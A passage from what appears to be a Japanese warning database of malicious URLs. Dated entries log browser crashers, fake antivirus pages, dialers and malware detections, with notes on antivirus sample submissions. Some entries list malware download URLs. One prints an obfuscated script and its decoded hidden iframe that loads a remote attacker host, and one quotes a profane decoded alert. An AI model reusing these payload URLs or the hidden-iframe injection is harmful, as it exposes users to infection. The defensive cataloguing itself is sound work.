今日、その結果の連絡があり、ウィルス名:ADW_FUNWEB.B として検出するよう対応した、とのこと。 2006/08/19 にDLしたファイルからウィルス名:ADW_FUNWEB.B を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FUNWEB.B を検出することを確認。 |
| [2006/10/21] | ウィルス名:ADW_FUNWEB.B |
| [2006/01/03] | バスター無反応だが、以下のアンチウィルスソフトで反応。
ブラウザ:FireFox を狙ったカスタマイズ用の偽装アプリケーションらしい。 AntiVir → Adware-Spyware/ToolBar.MyWebSearch.24 adware BitDefender → Trojan.Muldrop.1326.R ClamAV → Adware.Mywebsearch-4 Dr.Web → Trojan.MulDrop.1326 Fortinet → Adware/MyWebSearch Kaspersky → not-a-virus:AdWare.Win32.MyWebSearch NOD32 → Win32/Adware.AdInstaller application Norman Virus Control → W32/MyWebSearch.AY UNA → Adware.MyWebSearch VBA32 → AdWare.ToolBar.MyWebSearch |
| [2007/03/11] | 再確認。ウィルス名:ADWARE_MYWEBSEARCH |
| [2006/01/09] | DL+解凍すると「f3Setup1.exe」なるファイルが現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Adware-Spyware/MyWebSearch adware ArcaVir → Trojan.Funweb ClamAV → Trojan.Dropper.Funweb.A Dr.Web → Adware.MySearch Kaspersky → not-a-virus:Downloader.Win32.FunWeb NOD32 → a variant of Win32/Adware.AdInstaller application UNA → TrojanDownloader.Win32.FunWeb VBA32 → RiskWare.Downloader.FunWeb |
| [2008/12/17] | DL+解凍して現れた「f3Setup1.exe」にはバスター無反応だが、いくつかのアンチウィルスソフトで反応。
この「f3Setup1.exe」をトレンドマイクロ社に提出。しかし、「不正なコードを含まない正常なファイル」という返事をもらった。 |
| [2007/03/07] | 2006/10/08 にトレンドマイクロ社にファイルを提出。
2006/10/13 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/08 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/08 から今日まではファイルは置き換えられていないと推測される。 |
| [2006/08/03] | DL+解凍して現れた「f3Setup1.exe」にはバスター無反応だが、いくつかのアンチウィルスソフトで反応。
この「f3Setup1.exe」をトレンドマイクロ社に提出。しかし、トレンドマイクロ社では「不正なコードを含まない正常なファイル」という返事をもらった。 |
| [2006/08/27] | ウィルス名:ADW_MYSEARCH.100 |
| [2007/04/28] | ウィルス名:TROJ_GENERIC |
| [2006/11/24] | ウィルス名:DIAL_EGROUP.BA |
| [2006/11/24] | ウィルス名:DIAL_ACCESS.AF |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AI |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AH |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AI |
| [2005/10/11] | ウィルス名:DIAL_TRSTWIN.A |
| [2005/03/07] | ウィルス名:TROJ_WINTRIM.W |
| [2005/03/28] | ウィルス名:TROJ_WINTRIM.DLL |
| [2005/03/28] | ウィルス名:DIAL_NCCDIALER.A |
| [2005/10/11] | 再確認。ウィルスファイルが置き換えられているかも。ウィルス名:TROJ_WINTRIM.DLL |
| [2005/10/11] | ウィルス名:TROJ_DIALER.FA |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.DLL |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AU |
| [2005/10/11] | ウィルス名:TROJ_TRILON.B |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AU |
| [2005/10/11] | ウィルス名:TROJ_TRILON.B |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.BB |
| [2006/11/24] | ウィルス名:DIAL_EGROUP.A |
| [2007/04/28] | ウィルス名:TROJ_GENERIC |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.BP |
| [2005/10/11] | ウィルス名:PE_WINTRIM.BO |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.AX |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.BK |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.BY |
| [2005/10/11] | ウィルス名:TROJ_PY.A |
| [2005/10/11] | ウィルス名:TROJ_WINTRIM.BJ |
| [2005/10/11] | ウィルス名:DIAL_INSACCESS.A |
| [2007/04/28] | ウィルス名:TROJ_P2E.AL |
| [2007/04/28] | ウィルス名:TROJ_GENERIC |
| [2006/11/24] | ウィルス名:TROJ_AGENT.EHZ |
| [2007/04/28] | ウィルス名:TROJ_GENERIC |
| [2007/04/28] | ウィルス名:TROJ_P2E.AJ |
| [2004/06/24] | telnet等を利用したIP抜き。メディアプレーヤーやリアルプレイヤーが強制起動。 |
| [2004/11/02] | タスクマネージャで脱出可。 |
| [2004/08/26] | IPを抜かれる。「お進みください」は //akausagi.com/tensai/ayasii/cgi-bin/ahya.cgi に飛ぶ。 |
| [2005/04/17] | ウィルス名:BKDR_CYN.21 |
| [2008/12/17] | 拡張子不明のファイルが落ちてくる。ウィルス名:TROJ_VNCKILL.HB として検出対応済。 |
| [2008/11/26] | ウィルス名:TROJ_GENERIC |
| [2008/11/26] | ウィルス名:TSPY_HAZIF.A |
| [2008/10/22] | ウィルス名:TROJ_AGENT.ISU |
| [2008/10/22] | ウィルス名:TROJ_AGENT.IRR |
| [2004/08/04] | //www.albinoblacksheep.com/flash/open.html と同一。 |
| [2006/04/14] | 再確認以下のURLに飛ぶが、ブラクラ発動は無し。確認したキャプ画像は これ 。
//www.albinoblacksheep.com/flash/youare.php |
| [2005/03/05] | ブラクラ:「 You are an idiot ! 」。
バスター無反応だが、他アンチウィルスソフト+環境により、ウイルス名:js_milala.a が検出されるらしい。 |
| [2006/04/14] | 再確認以下のURLに飛ぶが、ブラクラ発動は無し。確認したキャプ画像は これ 。
//www.albinoblacksheep.com/flash/youare.php |
| [2008/11/10] | ウィルス名:TROJ_DLOADE.DF |
| [2008/11/26] | ウィルス名:TROJ_DLOAD.DR |
| [2005/09/12] | ウィルス名:JAVA_BYTEVER.A |
| [2006/04/14] | 再確認。海外アダルトページに変更されている。キャプ画像は割愛。
バスター無反応で、怪しい挙動は確認出来なかった。 |
| [2008/09/21] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2005/05/06] | 無限ループ。 |
| [2005/10/22] | 無限ウィンドウオープン。「about:blank」画面が無限に開くブラクラ。
親元のタスクを強制終了で脱出可。数日前までは無害だったらしい。 |
| [2005/10/30] | 再確認。踏むと「Ψ真・MP3倉庫Ψ」という名のサイト。これが、5枚表示され、それぞれ読み込む。そして、読み込み終わると「about:blank」のブラクラが発動。親元のタスクの強制終了で脱出。 |
| [2004/10/26] | 踏むとウィルス名:HTML_RIDER.A+JAVA_BYTEVER.A-1 を検出。
もう一回踏むとウィルス名:HTML_RIDER.A のみ。更にもう一回踏むとウィルス未検出。 稀にサムネイル画像のどれか1枚が広告になっている場合がある。 |
| [2005/09/16] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Exploit/MS05-002.Ani.A BitDefender → Exploit.Win32.MS05-002.Gen ClamAV → Exploit.W32.MS05-002 Dr.Web → Exploit.ANIFile Kaspersky → Trojan-Downloader.Win32.Ani.c NOD32 → Win32/TrojanDownloader.Ani.gen VBA32 → Trojan-Downloader.Win32.Ani.c |
| [2005/09/16] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Trojan/Dldr.Small.agq.4 BitDefender → Trojan.Small.ALX Fortinet → BDoor.AZV-bdr NOD32 → a variant of Win32/TrojanDownloader.Small.AWA VBA32 → Trojan.Downloader.Small.1 |
| [2005/09/16] | ウィルス名:JAVA_BYTEVER.A |
| [2005/09/16] | 踏むと こんな感じ 。以下の3つのURLと関連している。
//allcount.net/lo/12.anr ← バスター無反応だが、他アンチウィルスソフトで反応。 //allcount.net/lo/count.jar ← ウィルス名:JAVA_BYTEVER.A //allcount.net/lo/12.exe ← バスター無反応だが、他アンチウィルスソフトで反応。 |
| [2006/08/29] | 2006/08/08 にトレンドマイクロ社にDL+解凍して現れた「dialer_activex.ocx」ファイルを提出。
未だにトレンドマイクロ社から結果の連絡は無いが、ウィルス名:DIAL_PORNDIAL.LL として対応してくれた模様。 2006/08/08 にDLしたファイルからウィルス名:DIAL_PORNDIAL.LL を検出することを確認。 しかし、今日改めて当該URLを見てみると404であった。 |
| [2005/03/06] | 何回か確認してみると、URLはこれだが、表示される画面が毎回違う。
しかし、確認した画面全てにおいてウィルス名:JAVA_BYTEVER.A を検出。 |
| [2005/10/16] | 他の方の鑑定結果は以下の「」内。
「表示してからしばらくしたら、ActiveX のインストールを促されます。内容は中国語なのでわかんないです。 サイト自体は中華系のサイトですが、中身は日本語でスーパーロボット大戦のOPとEDのタイトルと歌詞が置いてました。 歌詞の部分をクリックすると普通に日本語で表示(別窓)。 無害かとは思われますが、最新版でブロック機能のついたブラウザの使用を推奨。ウィルス・SPY系の反応はありませんでした。」 |
| [2005/10/16] | 踏むと こんな感じ のサイト。
表示してから暫らく経つとウィルス名:ADW_IEBAR.A を検出すると同時に このダイアログ を表示する。 |
| [2008/11/22] | 偽装ウィルス駆除ソフトのページに飛ぶ。 |
| [2005/03/12] | 海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A を検出。
これは //69.50.191.68/eb/be/count.html を読み込むため。 |
| [2005/07/23] | ウィルス名:JAVA_BYTEVER.A |
| [2005/10/27] | 再確認。//allteenmodel.com/ のトップページに飛ぶが、サーバーが見当たらず、「ページを表示できません」となる。 |
| [2005/07/15] | ウィルス名:JAVA_BYTEVER.A |
| [2005/07/01] | ウィルス名:JAVA_BYTEVER.A |
| [2005/04/22] | 「index.chm」という名のコンパイル済み HTML ヘルプファイルが落ちてくる。このファイルからウィルス名:CHM_PSYME.ASを検出。 |
| [2005/04/22] | 環境により、//allways.drusearch.com/traf/458/load.exe を OBJECT 実行させられる。 |
| [2005/03/18] | ウィルス名:MHTMLRedir.Exploit |
| [2005/04/22] | 次の3つのURLと関連している。OBJECT実行で @ を、IFRAME呼び出しで A と B をそれぞれ実行される。
@、//allways.drusearch.com//traf//458//index.chm A、//allways.drusearch.com/traf/458/ex2.htm B、//allways.drusearch.com/traf/458/test.php 上記で、B は真っ白なページで無害。@ と A はそれぞれのURL解説を参照。 |
| [2005/04/22] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
AntiVir → ウィルス名:TR/Dldr.Small.aln.3 AVG → ウィルス名:Downloader.Small.28.E BitDefender → ウィルス名:Trojan.Downloader.Small.ALN Dr.Web → ウィルス名:Trojan.DownLoader.2243 Kaspersky → ウィルス名:Trojan-Downloader.Win32.Small.aln mks_vir → ウィルス名:Trojan.Downloader.Small.Aln NOD32 → ウィルス名:Win32/TrojanDownloader.Small.NCF Norman Virus Control → ウィルス名:W32/DLoader.CPY VBA32 → ウィルス名:Trojan-Downloader.Win32.Small.aln |
| [2005/01/12] | ウィルス名:EXPL_SHEXPLOIT.A |
| [2008/10/23] | ウィルス名:HKTL_HIDEWIND.AA |
| [2008/11/08] | バスター無反応だが、以下の多くのウィルス駆除ソフトで反応。
AhnLab-V3 → Win-Trojan/Bbsxp.899439 Avast → Win32:Trojan-gen {Other} AVG → HackTool.AD CAT-QuickHeal → Hacktool.Perl.BBSXP.b (Not a Virus) ClamAV → Hacktool.Webdav-8 DrWeb → Tool.Flooder eTrust-Vet → Win32/IRCFlood F-Secure → HackTool.Perl.BBSXP.b GData → Win32:Trojan-gen {Other} Ikarus → DoS.Perl.BBDoS.c K7AntiVirus → HackTool.Perl.BBSXP.b Kaspersky → HackTool.Perl.BBSXP.b Symantec → Hacktool ViRobot → Toolkit.Win32.BBSXP.899439 2008/10/27 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、「弊社では正常ファイルとして判断したファイルであり、対応は行わない。」とのこと。 |
| [2008/10/23] | ウィルス名:BKDR_SERVU.I |
| [2008/10/23] | ウィルス名:PE_GENERIC |
| [2008/10/23] | ウィルス名:TSPY_DROPPER |
| [2008/10/23] | ウィルス名:TROJ_MALOGT.A |
| [2008/10/23] | ウィルス名:HKTL_HIDEWIND.AA |
| [2008/10/23] | ウィルス名:RAP_GENERIC |
| [2008/10/23] | ウィルス名:TROJ_GENERIC |
| [2008/11/08] | バスター無反応だが、以下の多くのウィルス駆除ソフトで反応。
AhnLab-V3 → Win-AppCare/Vnc.32768 AntiVir → SPR/VNC.A Authentium → W32/HackTool.CDN Avast → Win32:Trojan-gen {Other} AVG → HackTool.DCT BitDefender → Spyware.Vnc.A DrWeb → Tool.VncBypauth eSafe → Win32.Adload.a Ewido → Not-A-Virus.NetTool.Win32.VNC.a F-Prot → W32/HackTool.CDN F-Secure → NetTool.Win32.VNC.a Fortinet → HackerTool/VNC GData → Spyware.Vnc.A Ikarus → not-a-virus:NetTool.Win32.VNC.a K7AntiVirus → Non-Virus:NetTool.Win32.VNC.a Kaspersky → not-a-virus:NetTool.Win32.VNC.a McAfee → potentially unwanted program HTool-BypassVNC Microsoft → HackTool:Win32/Vncpass.A NOD32 → Win32/NetTool.VNC.A Panda → Application/BypassVnc Prevx1 → Malicious Software SecureWeb-Gateway → Riskware.VNC.A Sophos → VNC Vulnerability Scanner Symantec → Backdoor.Prorat TheHacker → Aplicacion/VNC.a ViRobot → Not_a_virus:VNC.Scanner.32768 2008/10/27 にトレンドマイクロ社にファイルを提出。 今日、その結果の連絡があり、「弊社では正常ファイルとして判断したファイルであり、対応は行わない。」とのこと。 |
| [2008/10/23] | ウィルス名:IRC_GENERIC+TROJ_GENERIC+HKTL_HIDEWIND.AA |
| [2008/10/23] | ウィルス名:HKTL_DFIND.B |
| [2006/06/24] | 踏むと これ を表示。「OK」を押すとリモホを表示して「WinAntiVirusPRO」の購入を勧めてくる。
「WinAntiVirusPRO」は偽装ウィルス駆除ソフトなので注意。 |
| [2006/04/08] | 踏むと これ を表示し、「OK」を押すとリモホを表示し、スパイウェア駆除ソフトのようなものをDLを催促するサイトを表示する。このサイトは右クリックすると これ を表示する。 |
| [2006/05/21] | 他の方の結果では
「悪名高き偽アンチウィルス、WinアンチウィルスPROを買わせようとする仕掛け。無視して閉じるが吉。」 |
| [2005/10/02] | 「激裏DVD」という名のサイトだが、ウィルス名:TROJ_ISTBAR.FS を検出。
OBJECTタグで以下の2つのファイルをインストール+実行しようとしているのが原因。 //cdn.climaxbucks.com/mt/dialers/fc/UniDistIO.CAB //cdn.climaxbucks.com/internet-optimizer/br/wsi13/optimize.exe |
| [2005/08/31] | 日本語のアダルトサイトだが、ウィルス名:TROJ_ISTBAR.FS を検出。
アクセス解析「shinobi」を使ってアクセスログを取っている。 |
| [2005/09/04] | ウィルス名:TROJ_ISTBAR.FS |
| [2006/10/26] | 「VIDEO KIDS」という名の海外アダルトサイトだが、「win32.exe」なるものが落ちてきてウィルス名:TROJ_TIBS.NT を検出。 |
| [2006/01/20] | 海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。 //game4all.biz/adv/120/new.php |
| [2006/04/13] | 他の方の結果では「ウインドウが45秒おきに増える これがルーレットで、有害を含むので、有害。」 |
| [2008/11/05] | 全画面フラッシュが始まる。タスクの強制終了で脱出可能だが、やや脱出困難であった。
慌ててしまいがちだが、F4キーを押し、タスクバーを表示させて(全画面フラッシュにかき消されるが)、落ち着いて隙を突いてタスクの強制終了をさせれば それで終わりである。 |
| [2004/12/04] | JS_AMILALA.A作成者?のサイトで注意が必要。
2004/07/01から復活していたが2004/12/04に確認しにいくと404の模様。 詳しくは こちら を参照。 |
| [2005/03/26] | 現在の//amilala.blogspot.comの詳細動作は こちら を参照。 |
| [2005/05/20] | 改めて確認。踏むと こんな感じの画面 。JavaScriptOFFにしてる状態では普通のBlogを表示。
「Under maintenance: This site is undergoing maintenance at the present time.」 ↑ 「メンテナンス中」らしいので、今後も注意が必要。 |
| [2005/07/09] | 踏むと このアラート を表示。「OK」を選ぶと これ を表示。「キャンセル」を選ぶと これ を表示。
これ の「OK」「キャンセル」のどちらを選んでも海外のトレンドマイクロ社のウィルス名:JS_AMILALA.Bの説明ページに飛ぶ。 |
| [2004/07/10] | 他の方の解説は こちら 。 |
| [2005/08/08] | 以下は このアラート の解読法を紹介。−−提供して頂いた情報−−
−解読法− 1=IまたはL 0=O U=you R=are 8=B B=be N=多分inだと思います。(これはわからない) W/=まったくわからないのでweにしておきます。 だと、思います。解読文載せておきます。 Yup dis Blog is also dumbfuck dat bnt no ma main webby. Meet dun give a shit now ittl be going on. ++For all of who are japan yahoo Bastars++ Damn fag just get lost yall dickheads you are even jerk now. Should dap you asshie in get outer here. This bnt a porn site you love in how all yall muth a fuckers you smeily skunky cunt. Just fuck off okie shit. Mum will suck off you're micro cock drenched we come. Did will lick up you're giga clit soaked we sperm LaLa*Land Exploit dew manager vxLaLa_root, Chair of Yahoo Booters[AmiLaLaFlowers] という感じだと思います。 独特の英文もあるので翻訳は難しいと思います。 多分作者はオーストラリア人です。Hiyaはオーストラリアの方言でHiの意です。 -------------------------------------------- |
| [2006/01/19] | 改めて確認。踏むと これ を表示。
「OK」を選ぶと以下のURLに飛び、こんな感じ のページを表示する。普通に閉じれる。 //amilala.blogspot.com/admin/HTTP404 「キャンセル」を選ぶと これ を表示。 これ の「OK」「キャンセル」のどちらを選んでも以下のURLに飛び、googleの検索結果のページを表示する。「Amilala」という言葉を検索した結果である。 //www.google.com/search?hl=en&q=Amilala |
| [2006/03/29] | −以下は2chでのレス−
|
| [2006/08/07] | 他の方の結果は以下の「」内。
「変なアラートが表示され、閉じるとユーザープロンプトが開きます。 それを閉じると VX Talks - Log in という洋ログインページ?に行きました。全てキャンセルで閉じてます。 そこまでウイルス反応なしでしたが、amilala.blogspot.com が危険URL指定なので踏まないほうがいいでしょう。」 |
| [2004/03/29] | //raus.de/crashme/に飛ぶ。 |
| [2004/08/04] | 無限JavaScript。タスクマネージャから脱出。 |
| [2006/04/13] | 他の方の結果では「「脱糞されますた」と永遠に出てくる。」 |
| [2006/12/21] | 再確認。無限アラート。これ が閉じても閉じても表示する。 |
| [2006/08/29] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_STARTPA.GP として検出するよう対応、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TROJ_STARTPA.GP を検出することを確認。 また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TROJ_STARTPA.GP を検出することを確認。 |
| [2008/10/09] | 以下のURLに飛び、ウィルス名:JS_DLOADER.XSV を検出。
//www.k5dionne.com/ffxmmi/ |
| [2003/11/08] | リンク先はブラクラ。 |
| [2004/06/23] | 下のURLに飛び、ブラクラチェッカーは無反応だがmailtoストームを発動。
//www.angelfire.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=2EF53A187E |
| [2004/07/22] | スパイウェアの可能性。読み込むとウィンドウが2つ出てくる。
1つ目は「あなたのパソコンにspy wareが侵入しているかもしれないよ。OKを押せば、どうやって排除するのかわかるよ」というダイアログが出てくる。 2つ目は、洋ロリのギャラリーにリンクされている。 |
| [2006/04/13] | 他の方の結果では「ドメイン屋さんページだが、広告鯖が、指摘の通りに言ってくる可能性は十分にある。」 |
| [2008/10/23] | 2重拡張子。ウィルス名:TROJ_AGENT.AHEF |
| [2006/01/15] | 厨房ホイホイ系ブラクラ。踏むといくつか怪しい挙動がある。具体的には以下。
|
| [2006/03/12] | 他の方の結果では
「telnetやリアルプレーヤーなどが起動してIPが抜かれてしまうブラクラでした。PC有害。ノートン先生は無反応です。」 「telnetやreal-pやニュースページが立ち上がった後、自身のIPを画面表示されます。注意URLにつき回避を推奨します。」 |
| [2006/03/29] | 「wmpやらrealoneやらDOSプロンプトやら開きまくる怪しいサイト。」 |
| [2006/04/13] | TELNETストーム。 |
| [2006/04/06] | 他の方の結果では
「普通のブラクラ。環境によるけど複数のアプリが勝手に起動(realplayerとかoutlook)。 後はtelnetストーム、IPの表示、勝手にニュースグループを作成、など。PCに対する破壊活動と言えるものは無い。各アプリを終了させれば問題無し。面倒なら再起動。」 「厨房ホイホイというブラクラ。」 |
| [2006/04/08] | TELNETストーム。 |
| [2006/10/01] | 2006/09/24 にトレンドマイクロ社にファイルを提出。
2006/09/29 にその結果の連絡があり、ウィルス名:DIAL_ERODIAL.AD として検出するよう対応、とのこと。 2006/09/24 にDLしたファイルからウィルス名:DIAL_ERODIAL.AD を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ERODIAL.AD を検出することを確認。 |
| [2005/03/26] | エロ漫画サムネイルページだが、ウィルス名:TROJ_HOLICA.Cを検出らしい。私が踏むとウィルス名:TROJ_ISTBAR.FSを検出。
稀に こんなセキュリティ警告 も表示する。ノートン、マカフィーでは無反応。 |
| [2004/12/18] | ウィルス名:VBS_REDLOF.A |
| [2005/03/06] | ウィルス名:VBS_REDLOF.A-1 |
| [2008/11/15] | ウィルス名:TROJ_ADLOAD.NBH |
| [2008/10/23] | 2重拡張子。ウィルス名:TROJ_RENOS.ADX |
| [2008/09/04] | こんな感じ のサイトだが、ウィルス名:JS_DLOADER.XSV を検出。
ソースを見ると、IFRAMEタグで //www.k5dionne.com/ffxmmi/ を呼び出している。 |
| [2005/03/26] | //unei.anti.bne.jp/bom/に飛ぶ。 |
| [2007/05/12] | 再確認。Location ヘッダで、以下のURLに飛び、「You should die for the global peace」というアラートを閉じても閉じても表示する。
//unei.anti.bne.jp/bom/ |
| [2005/03/03] | ウィルス名:WORM_SKA.A |
| [2009/02/01] | インチキセキュリティサイトと思われる。 |
| [2008/09/16] | 2008/09/07 にトレンドマイクロ社にファイルを提出。
2008/09/15 に その結果の連絡があり、ウィルス名:ADW_FAKEAV として検出するよう対応、とのこと。 実際に 2008/09/07 にDLしたファイルからウィルス名:ADW_FAKEAV を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FAKEAV を検出することを確認。 2008/09/07 から今日までのファイルの置き換えは無い、と推測される。 |
| [2008/11/05] | こんな感じ のページ。インチキセキュリティサイトである。
これ を表示し、「OK」を押すと これ を表示する。 以下のファイルをDLしろ、と催促してくるが、このファイルからウィルス名:PAK_GENERIC.001 を検出。 //godd-soft-downloadz.net/antivirus.v.1.0.21151.exe |
| [2008/07/14] | ウィルス名:TSC_GENCLEAN |
| [2008/08/24] | 再確認。ウィルス名:Cryp_Pai-5 |
| [2008/12/24] | これ や これ を表示し、以下のURLに飛ぶ。インチキスパイウェア駆除サイトである。
//antiviruspcfullscan.com/360/1/en/_freescan.php?sid=880278 |
| [2008/09/13] | ウィルス名:TSC_GENCLEAN+WORM_AUTORUN.AMH |
| [2008/12/24] | こんな感じ のサイト。インチキスパイウェア駆除サイトである。 |
| [2006/11/23] | こんな感じ のサイト。
以下の @ と A のURLを新窓表示して、ウィルス名:TROJ_DLOADBR.GEN を検出。 これ を表示して、「OK」を押すと再びウィルス名:TROJ_DLOADBR.GEN を検出、今度はこれ を表示する。 再び「OK」を押すと再度ウィルス名:TROJ_DLOADBR.GEN を検出して今度は「243461.exe」なるものをDLしろ、と言ってくる。このexeは不定期的に新しいファイルに置き換えられている。 ソースを見ると隠しスクリプトで上記の挙動を起こしている。隠しスクリプトで呼び出されるURLは以下の B、C、D である。このうち D が元凶である。 @、//teenalbums.com/index.php ← 海外アダルトサイト。 A、//www.x-park.net/ ← ページが無くなっている模様。 B、//anycracks.com/anycracks.js C、//69.31.84.220/pay/enter.php?id=2 ← 文字だけのページ。 D、//yournetaccess.com/b/?id=st00274&r= |
| [2008/10/23] | 2重拡張子。ウィルス名:TROJ_SMALL.GWL |
| [2006/07/20] | 2006/07/14 にトレンドマイクロ社にファイルを提出。
本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.Z として対応とのこと。 当ファイルをDLしてウィルスを検出することを確認。 |
| [2006/07/20] | 2006/07/14 にトレンドマイクロ社にファイルを提出。
本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.AA として対応とのこと。 当ファイルをDLしてウィルスを検出することを確認。 |
| [2006/07/20] | 2006/07/14 にトレンドマイクロ社にファイルを提出。
本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.AB として対応とのこと。 当ファイルをDLしてウィルスを検出することを確認。 |
| [2005/03/23] | ウィルス名:ADW_EZULA.A |
| [2006/07/13] | ウィルス名:ADW_EZULA.B |
| [2006/07/13] | ウィルス名:ADW_WEBOFFER.A |
| [2006/09/01] | 2006/08/13 にトレンドマイクロ社にDL+解凍して現れた「adwerkz.dll」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_DESKWIZZ.A として検出するよう対応、とのこと。 2006/08/13 にDLしたファイルからウィルス名:ADW_DESKWIZZ.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DESKWIZZ.A を検出することを確認。 |
| [2006/08/13] | ウィルス名:TROJ_SMALL.AXZ |
| [2005/12/13] | ウィルス名:SPYW_TRACKAPPS.A 。スパイウェアの一種:キーロガーに属するものなので注意。 |
| [2005/12/13] | スパイウェア配布サイトのページ。踏むと こんな感じ 。このページ表示まで無害で、普通に閉じれる。
画面中央の「AppsTraka v3.16 (USA)」というリンクをクリックすると、以下のexeがDLできるが、ウィルス名:SPYW_TRACKAPPS.Aを検出する。 //appstraka.globalpatrol.net/appstraka316.exe |
| [2008/09/20] | 確認してみると、以下のURLに飛ぶので、そちらのURL List解説を参照。
//maplestorfy.w16.okwit.com/kurubusi/sityounew.html |
| [2008/09/20] | 他の方の結果は以下の「」内。 「踏んでみると Kaspersky がウイルス「Trojan-Downloader.HTML.IFrame.ff 」を検出。」 |
| [2008/09/21] | 「メイプルストーリーの音楽が再生されますが、同時にウイルス名:VBS:Malware-gen、HTML:CVE-2007-0024-B、ANI:CVE-2007-0038 を検出しました。」 |
| [2008/10/23] | ウィルス名:CRYP_XED-3+TROJ_SRIZBI.AO |
| [2007/03/24] | 海外アダルトサイト。バスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。 |
| [2008/09/17] | 確認してみると、まず、こんな感じ のページを数秒間表示する。
その後、以下の @ に一瞬飛んで、すぐに以下の A に飛び、こんな感じ のページを表示する。 A では、まず これ を表示。「OK」を押すと次に これ を表示。 これ では、「OK」を選ぶと以下の B のファイルをDLしろ、と催促してくる。 「キャンセル」を選ぶと何も無いが、少し経つと これ を表示する。 これ では、「OK」を選ぶと以下の B のファイルをDLしろ、と催促してくる。 「キャンセル」を選ぶと再び これ を表示、再び「キャンセル」を選ぶと再び これ を表示する。 結局、これ は「OK」を選ぶしかないようになっている。 また、このサイトは普通に閉じれる。 −−−−−−−−−−−−−−−−−−−− @、//scan-ia.com/?uid=152 A、//scan-ia.com/19/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1 B、//scan-ia.com/download/IAInstall.exe |
| [2008/09/17] | 他の方の結果は以下の「」内。
大窓&無限強制アラートでexeをダウンロードさせる偽装セキュリティ窓が開きます。 「Trojan-Downloader.Win32.FraudLoad.vcci」を Kaspersky で検出。 |
| [2008/08/29] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_VB.HUQ |
| [2005/07/30] | 踏むたびに表示されるものが違う。調べるとどうやら4種類の表示があるようで、それぞれ症状も若干違う。探せば他の表示もあるかも知れない。
その4つのソースは こちら → ソース1、ソース2、ソース3、ソース4 4つともウィルス名:JAVA_BYTEVER.Aが検出されるが、JAVA_BYTEVER.Aを検出する前にウィルス名:TROJ_SMALL.ANNを検出する場合もある。 また、少ししてウィルス名:JS_MHTREDIR.AGを検出する場合もある。 4つとも別窓が存在する。その別窓を閉じると違う別窓を表示する、の繰り返し。立て続けに閉じれば脱出可。 4つのソースのうち、1つのソースの中に以下の暗号化された部分がある。 60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58, 47,47,97,109,98,117,115,104,45,115,99,114,105,112,116,46,99,111,109, 47,108,100,47,105,102,114,97,109,101,46,112,104,112,63,97,99,99, 61,97,98,114,97,105,34,32,115,116,121,108,101,61,34,100,105,115,112, 108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62 ↑ これを復号化すると以下のスクリプトが現れる。 ↓ <iframe src="http://ambush-script.com/ld/iframe.php?aca=abrai" style="display:none"></iframe> ↑ //ambush-script.com/ld/iframe.php?aca=abraiに行ってみるが、ページ自体は存在するものの、真っ白なページ。 |
| [2008/11/17] | ウィルス名:TROJ_AGENT.HYN |
| [2008/11/15] | ウィルス名:ADWARE_SAFESURF |
| [2005/01/18] | ニュースストーム。telnetストーム。 |
| [2005/03/18] | アウトルックが立ち上がり、yahooの何か購読を登録される。
その後、メディアプレーヤー、クイックタイムが立ち上がり、タスクマネージャで強制脱出。 |
| [2005/01/16] | 「吉野家」のテンプレートというページだがconconクラッシャーの可能性。
ただし、WinXPは無害、Win9xは最新バッチなら回避可。 |
| [2005/04/01] | 改めて確認すると、ウィルス名:JS_SPAWN.A。ブラクラ:「You are an idiot ! 」 |
| [2005/05/27] | 改めて確認。ウィルス+ブラクラ複合型になっている。
ウィルス名:JS_SPAWN.A+VBS_REDLOF.A.GEN。ブラクラ:「You are an idiot ! 」 ウィルスはIE最新パッチなら無害。Alt+F4押しっぱなしで脱出。 |
| [2006/07/24] | 他の方の結果は以下の「」内。
